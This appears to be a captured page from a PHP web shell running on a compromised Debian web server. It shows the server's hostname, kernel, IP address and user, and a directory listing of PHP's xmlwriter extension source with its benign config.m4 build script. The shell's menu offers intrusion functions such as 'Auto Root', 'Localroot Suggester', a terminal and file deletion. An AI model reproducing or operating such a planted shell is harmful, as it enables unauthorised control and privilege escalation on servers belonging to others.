Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
xmlwriter /
Delete
Unzip
Name
Size
Permission
Date
Action
.libs
[ DIR ]
drwxr-xr-x
2024-03-12 14:32
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
CREDITS
42
B
-rw-rw-r--
2022-10-31 11:36
config.m4
515
B
-rw-rw-r--
2022-10-31 11:36
config.w32
552
B
-rw-rw-r--
2022-10-31 11:36
php_xmlwriter.c
52.78
KB
-rw-rw-r--
2022-10-31 11:36
php_xmlwriter.h
2.05
KB
-rw-rw-r--
2022-10-31 11:36
php_xmlwriter.lo
344
B
-rw-r--r--
2024-03-12 14:32
php_xmlwriter.o
231.48
KB
-rw-r--r--
2024-03-12 14:32
Save
Rename
PHP_ARG_ENABLE([xmlwriter], [whether to enable XMLWriter support], [AS_HELP_STRING([--disable-xmlwriter], [Disable XMLWriter support])], [yes]) if test "$PHP_XMLWRITER" != "no"; then if test "$PHP_LIBXML" = "no"; then AC_MSG_ERROR([XMLWriter extension requires LIBXML extension, add --with-libxml]) fi PHP_SETUP_LIBXML(XMLWRITER_SHARED_LIBADD, [ AC_DEFINE(HAVE_XMLWRITER,1,[ ]) PHP_NEW_EXTENSION(xmlwriter, php_xmlwriter.c, $ext_shared) PHP_SUBST(XMLWRITER_SHARED_LIBADD) ]) fi